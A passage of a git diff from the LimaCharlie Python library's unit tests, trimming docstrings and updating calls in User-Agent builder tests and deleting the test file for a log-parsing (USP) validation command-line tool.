-        Test that OS detection falls back gracefully on errors.
-
-        Should return basic platform.system() value on error.
-        """
         with mock.patch('platform.freedesktop_os_release', side_effect=Exception("Mock error")):
             with mock.patch('platform.system', return_value='Linux'):
-                result = _build_user_agent()
+                result = build_user_agent("lc-py-api", "5.0.0")
                 parts = result.split(';')
                 os_part = parts[2]
-                # Should fall back to 'linux'
                 assert os_part.lower() == 'linux'
 
 
@@ -303,40 +107,26 @@ class TestUserAgentSSLVersion:
     """Tests for SSL version detection in User-Agent functions."""
 
     def test_ssl_version_format(self):
-        """
-        Test that SSL version has the correct format when available.
-
-        Example: openssl-3.0.0
-        """
         if not hasattr(ssl, 'OPENSSL_VERSION_INFO'):
             pytest.skip("OPENSSL_VERSION_INFO not available")
 
-        result = _build_user_agent()
-
+        result = build_user_agent("lc-py-api", "5.0.0")
         ssl_parts = [p for p in result.split(';') if p.startswith('openssl-')]
         assert len(ssl_parts) == 1
 
         ssl_part = ssl_parts[0]
-        # Format should be openssl-X.Y.Z
         version_str = ssl_part.replace('openssl-', '')
         version_components = version_str.split('.')
         assert len(version_components) == 3
-        # Each component should be a number
         for component in version_components:
             assert component.isdigit()
 
     def test_ssl_version_matches_system(self):
-        """
-        Test that SSL version in User-Agent matches system SSL info.
-
-        Verifies the extracted version matches ssl.OPENSSL_VERSION_INFO.
-        """
         if not hasattr(ssl, 'OPENSSL_VERSION_INFO'):
             pytest.skip("OPENSSL_VERSION_INFO not available")
 
-        result = _build_user_agent()
+        result = build_user_agent("lc-py-api", "5.0.0")
         ssl_info = ssl.OPENSSL_VERSION_INFO
-
         expected_ssl = 'openssl-%d.%d.%d' % (ssl_info[0], ssl_info[1], ssl_info[2])
         assert expected_ssl in result
 
@@ -345,22 +135,12 @@ class TestUserAgentUtilityFunctions:
     """Tests for individual utility functions in user_agent_utils.py."""
 
     def test_get_python_version_format(self):
-        """
-        Test that _get_python_version returns correctly formatted version.
-
-        Format should be: python-X.Y.Z
-        """
         result = _get_python_version()
         assert result.startswith('python-')
         version_part = result.replace('python-', '')
         assert version_part.count('.') == 2
 
     def test_get_python_version_matches_sys_version(self):
-        """
-        Test that _get_python_version matches current Python version.
-
-        Verifies the version matches sys.version_info.
-        """
         result = _get_python_version()
         expected = 'python-%d.%d.%d' % (
             sys.version_info.major,
@@ -370,21 +150,11 @@ def test_get_python_version_matches_sys_version(self):
         assert result == expected
 
     def test_get_os_info_returns_string(self):
-        """
-        Test that _get_os_info returns a non-empty string.
-
-        Should return some OS identifier.
-        """
         result = _get_os_info()
         assert isinstance(result, str)
         assert len(result) > 0
 
     def test_get_ssl_version_format(self):
-        """
-        Test that _get_ssl_version returns correct format when available.
-
-        Format should be: openssl-X.Y.Z or None
-        """
         result = _get_ssl_version()
         if result is not None:
             assert result.startswith('openssl-')
@@ -392,34 +162,15 @@ def test_get_ssl_version_format(self):
             assert version_part.count('.') == 2
 
     def test_build_user_agent_custom_prefix(self):
-        """
-        Test that build_user_agent accepts custom prefix and version.
-
-        Verifies the function can build User-Agent with any prefix.
-        """
         result = build_user_agent('custom-lib', '1.2.3')
         assert result.startswith('custom-lib/1.2.3;')
-        # Should still contain python version and OS
         assert 'python-' in result
 
     def test_build_user_agent_component_order(self):
-        """
-        Test that build_user_agent returns components in correct order.
-
-        Order should be: library, python, os, ssl (optional)
-        """
         result = build_user_agent('test-lib', '0.0.1')
         parts = result.split(';')
-
-        # First part should be library version
         assert parts[0] == 'test-lib/0.0.1'
-
-        # Second part should be Python version
         assert parts[1].startswith('python-')
-
-        # Third part should be OS (any string)
         assert len(parts[2]) > 0
-
-        # Fourth part (if exists) should be SSL
         if len(parts) > 3:
             assert parts[3].startswith('openssl-')
diff --git a/tests/unit/test_usp.py b/tests/unit/test_usp.py
deleted file mode 100644
index 99d54dce..00000000
--- a/tests/unit/test_usp.py
+++ /dev/null
@@ -1,390 +0,0 @@
-"""
-Unit tests for the USP (Universal Sensor Protocol) CLI module.
-
-Tests the USP validation CLI functionality including argument parsing,
-file loading, and error handling.
-"""
-
-import json
-import os
-import sys
-import tempfile
-import pytest
-import yaml
-
-from limacharlie.USP import (
-    _load_file_content,
-    _load_mapping,
-    main,
-    printData,
-    reportError,
-)
-
-
-class TestLoadFileContent:
-    """Tests for the _load_file_content helper function."""
-
-    def test_load_text_file(self, tmp_path):
-        """Test loading a plain text file."""
-        test_content = "line1\nline2\nline3"
-        test_file = tmp_path / "test.txt"
-        test_file.write_text(test_content)
-
-        result = _load_file_content(str(test_file), as_json=False)
-        assert result == test_content
-
-    def test_load_json_file(self, tmp_path):
-        """Test loading a JSON file."""
-        test_data = [{"key": "value"}, {"key2": "value2"}]
-        test_file = tmp_path / "test.json"
-        test_file.write_text(json.dumps(test_data))
-
-        result = _load_file_content(str(test_file), as_json=True)
-        assert result == test_data
-
-    def test_load_nonexistent_file(self):
-        """Test that loading a nonexistent file exits with error."""
-        with pytest.raises(SystemExit) as exc_info:
-            _load_file_content("/nonexistent/path/file.txt", as_json=False)
-        assert exc_info.value.code == 1
-
-    def test_load_invalid_json(self, tmp_path):
-        """Test that loading invalid JSON exits with error."""
-        test_file = tmp_path / "invalid.json"
-        test_file.write_text("not valid json {{{")
-
-        with pytest.raises(SystemExit) as exc_info:
-            _load_file_content(str(test_file), as_json=True)
-        assert exc_info.value.code == 1
-
-
-class TestLoadMapping:
-    """Tests for the _load_mapping helper function."""
-
-    def test_load_mapping_from_yaml_file(self, tmp_path):
-        """Test loading mapping from a YAML file."""
-        mapping_data = {
-            "parsing_re": r"(?P<timestamp>\S+) (?P<msg>.*)",
-            "event_type_path": "event_type"
-        }
-        yaml_file = tmp_path / "mapping.yaml"
-        yaml_file.write_text(yaml.dump(mapping_data))
-
-        # Use object instance to avoid class-scope variable access issues
-        class Args:
-            pass
-        args = Args()
-        args.mapping_file = str(yaml_file)
-        args.mapping = None
-
-        result = _load_mapping(args)
-        assert result == mapping_data
-
-    def test_load_mapping_from_json_file(self, tmp_path):
-        """Test loading mapping from a JSON file."""
-        mapping_data = {
-            "parsing_re": r"(?P<timestamp>\S+) (?P<msg>.*)",
-        }
-        json_file = tmp_path / "mapping.json"
-        json_file.write_text(json.dumps(mapping_data))
-
-        # Use object instance to avoid class-scope variable access issues
-        class Args:
-            pass
-        args = Args()
-        args.mapping_file = str(json_file)
-        args.mapping = None
-
-        result = _load_mapping(args)
-        assert result == mapping_data
-
-    def test_load_mapping_from_inline_json(self):
-        """Test loading mapping from inline JSON argument."""
-        mapping_json = '{"parsing_re": "(?P<ts>\\\\S+)"}'
-
-        class Args:
-            mapping_file = None
-            mapping = mapping_json
-
-        result = _load_mapping(Args())
-        assert result == {"parsing_re": r"(?P<ts>\S+)"}
-
-    def test_load_mapping_invalid_inline_json(self):
-        """Test that invalid inline JSON exits with error."""
-        class Args:
-            mapping_file = None
-            mapping = "not valid json"
-
-        with pytest.raises(SystemExit) as exc_info:
-            _load_mapping(Args())
-        assert exc_info.value.code == 1
-
-    def test_load_mapping_returns_none_if_not_provided(self):
-        """Test that no mapping returns None."""
-        class Args:
-            mapping_file = None
-            mapping = None
-
-        result = _load_mapping(Args())
-        assert result is None
-
-
-class TestPrintData:
-    """Tests for the printData helper function."""
-
-    def test_print_string(self, capsys):
-        """Test printing a plain string."""
-        printData("test message")
-        captured = capsys.readouterr()
-        assert "test message" in captured.out
-
-    def test_print_dict(self, capsys):
-        """Test printing a dictionary (as YAML)."""
-        printData({"key": "value"})
-        captured = capsys.readouterr()
-        assert "key: value" in captured.out
-
-
-class TestReportError:
-    """Tests for the reportError helper function."""
-
-    def test_report_error_exits(self):
-        """Test that reportError exits with code 1."""
-        with pytest.raises(SystemExit) as exc_info:
-            reportError("test error")
-        assert exc_info.value.code == 1
-
-    def test_report_error_writes_to_stderr(self, capsys):
-        """Test that reportError writes to stderr."""
-        with pytest.raises(SystemExit):
-            reportError("error message")
-        captured = capsys.readouterr()
-        assert "error message" in captured.err
-
-
-class TestMainArgParsing:
-    """Tests for the main CLI argument parsing."""
-
-    def test_main_shows_help(self, capsys):
-        """Test that --help works."""
-        with pytest.raises(SystemExit) as exc_info:
-            main(["validate", "--help"])
-        # argparse exits with 0 on --help
-        assert exc_info.value.code == 0
-
-    def test_main_requires_action(self, capsys):
-        """Test that missing action shows error."""
-        with pytest.raises(SystemExit) as exc_info:
-            main([])
-        assert exc_info.value.code == 2  # argparse error code
-
-    def test_main_validates_platform_choices(self, capsys):
-        """Test that invalid platform shows error."""
-        with pytest.raises(SystemExit) as exc_info:
-            main(["validate", "--platform", "invalid_platform"])
-        assert exc_info.value.code == 2  # argparse error code
-
-    def test_main_accepts_valid_platforms(self, capsys):
-        """Test that valid platforms are accepted."""
-        valid_platforms = ["text", "json", "cef", "gcp", "aws"]
-        for platform in valid_platforms:
-            # This will fail due to missing input, but platform should be accepted
-            with pytest.raises(SystemExit) as exc_info:
-                main(["validate", "--platform", platform])
-            # Exit code 1 means it got past argument parsing (missing input error)
-            assert exc_info.value.code == 1
-
-    def test_main_accepts_output_formats(self, capsys):
-        """Test that output format choices are valid."""
-        valid_formats = ["summary", "json", "yaml"]
-        for fmt in valid_formats:
-            with pytest.raises(SystemExit) as exc_info:
-                main(["validate", "--output-format", fmt])
-            # Exit code 1 means it got past argument parsing
-            assert exc_info.value.code == 1
-
-
-class TestValidateAction:
-    """Tests for the validate action end-to-end."""
-
-    def test_validate_requires_mapping_or_mappings(self, capsys):
-        """Test that validation fails without mapping."""
-        with pytest.raises(SystemExit) as exc_info:
-            main(["validate", "--input", "test data"])
-        assert exc_info.value.code == 1
-        captured = capsys.readouterr()
-        assert "mapping" in captured.err.lower()
-
-    def test_validate_requires_input(self, capsys, tmp_path):
-        """Test that validation fails without input."""
-        mapping_file = tmp_path / "mapping.yaml"
-        mapping_file.write_text(yaml.dump({"parsing_re": ".*"}))
-
-        with pytest.raises(SystemExit) as exc_info:
-            main(["validate", "--mapping-file", str(mapping_file)])
-        assert exc_info.value.code == 1
-        captured = capsys.readouterr()
-        assert "input" in captured.err.lower()
-
-    def test_validate_json_input_must_be_array(self, capsys, tmp_path):
-        """Test that JSON input must be an array."""
-        mapping_file = tmp_path / "mapping.yaml"
-        mapping_file.write_text(yaml.dump({"parsing_re": ".*"}))
-
-        # Create a JSON file with an object instead of array
-        input_file = tmp_path / "input.json"
-        input_file.write_text('{"key": "value"}')
-
-        with pytest.raises(SystemExit) as exc_info:
-            main([
-                "validate",
-                "--mapping-file", str(mapping_file),
-                "--input-file", str(input_file),
-                "--json-input"
-            ])
-        assert exc_info.value.code == 1
-        captured = capsys.readouterr()
-        assert "array" in captured.err.lower()
-
-    def test_validate_mappings_file_must_be_array(self, capsys, tmp_path):
-        """Test that mappings file must contain an array."""
-        mappings_file = tmp_path / "mappings.json"
-        mappings_file.write_text('{"not": "array"}')
-
-        with pytest.raises(SystemExit) as exc_info:
-            main([
-                "validate",
-                "--mappings-file", str(mappings_file),
-                "--input", "test"
-            ])
-        assert exc_info.value.code == 1
-        captured = capsys.readouterr()
-        assert "array" in captured.err.lower()
-
-    def test_validate_indexing_file_must_be_array(self, capsys, tmp_path):
-        """Test that indexing file must contain an array."""
-        mapping_file = tmp_path / "mapping.yaml"
-        mapping_file.write_text(yaml.dump({"parsing_re": ".*"}))
-
-        indexing_file = tmp_path / "indexing.json"
-        indexing_file.write_text('{"not": "array"}')
-
-        with pytest.raises(SystemExit) as exc_info:
-            main([
-                "validate",
-                "--mapping-file", str(mapping_file),
-                "--input", "test",
-                "--indexing-file", str(indexing_file)
-            ])
-        assert exc_info.value.code == 1
-        captured = capsys.readouterr()
-        assert "array" in captured.err.lower()
-
-
-class TestValidateEmptyResults:
-    """Tests for empty results handling in validation."""
-
-    def test_empty_results_exits_with_error(self, capsys, monkeypatch):
-        """Test that empty parsing results cause exit with error code 1."""
-        # Create a mock Manager class that returns empty results
-        class MockManager:
-            def __init__(self, *args, **kwargs):
-                pass
-
-            def validateUSP(self, **kwargs):
-                return {
-                    'errors': [],
-                    'results': []  # Empty results
-                }
-
-        # Patch the Manager class in the USP module
-        import limacharlie.USP as usp_module
-        monkeypatch.setattr(usp_module, 'Manager', MockManager)
-
-        with pytest.raises(SystemExit) as exc_info:
-            main([
-                "validate",
-                "--platform", "cef",  # Built-in parser, no mapping needed
-                "--input", "test data"
-            ])
-        assert exc_info.value.code == 1
-
-    def test_empty_results_shows_warning_message(self, capsys, monkeypatch):
-        """Test that empty results display helpful warning message."""
-        class MockManager:
-            def __init__(self, *args, **kwargs):
-                pass
-
-            def validateUSP(self, **kwargs):
-                return {
-                    'errors': [],
-                    'results': []
-                }
-
-        import limacharlie.USP as usp_module
-        monkeypatch.setattr(usp_module, 'Manager', MockManager)
-
-        with pytest.raises(SystemExit):
-            main([
-                "validate",
-                "--platform", "cef",
-                "--input", "test data"
-            ])
-
-        captured = capsys.readouterr()
-        # Check that warning message is displayed
-        assert "No events were parsed" in captured.out
-        assert "VALIDATION FAILED" in captured.out
-
-    def test_empty_results_shows_suggestions(self, capsys, monkeypatch):
-        """Test that empty results show troubleshooting suggestions."""
-        class MockManager:
-            def __init__(self, *args, **kwargs):
-                pass
-
-            def validateUSP(self, **kwargs):
-                return {
-                    'errors': [],
-                    'results': []
-                }
-
-        import limacharlie.USP as usp_module
-        monkeypatch.setattr(usp_module, 'Manager', MockManager)
-
-        with pytest.raises(SystemExit):
-            main([
-                "validate",
-                "--platform", "cef",
-                "--input", "test data"
-            ])
-
-        captured = capsys.readouterr()
-        # Check that suggestions are displayed
-        assert "parsing_re" in captured.out.lower() or "regex" in captured.out.lower()
-        assert "platform" in captured.out.lower()
-
-    def test_non_empty_results_succeeds(self, capsys, monkeypatch):
-        """Test that non-empty results succeed without error."""
-        class MockManager:
-            def __init__(self, *args, **kwargs):
-                pass
-
-            def validateUSP(self, **kwargs):
-                return {
-                    'errors': [],
-                    'results': [{'event_type': 'test', 'data': 'parsed'}]
-                }
-
-        import limacharlie.USP as usp_module
-        monkeypatch.setattr(usp_module, 'Manager', MockManager)
-
-        # Should not raise SystemExit
-        main([
-            "validate",
-            "--platform", "cef",
-            "--input", "test data"
-        ])
-
-        captured = capsys.readouterr()
-        assert "VALIDATION SUCCESSFUL" in captured.out
-        assert "Parsed 1 event(s)" in captured.out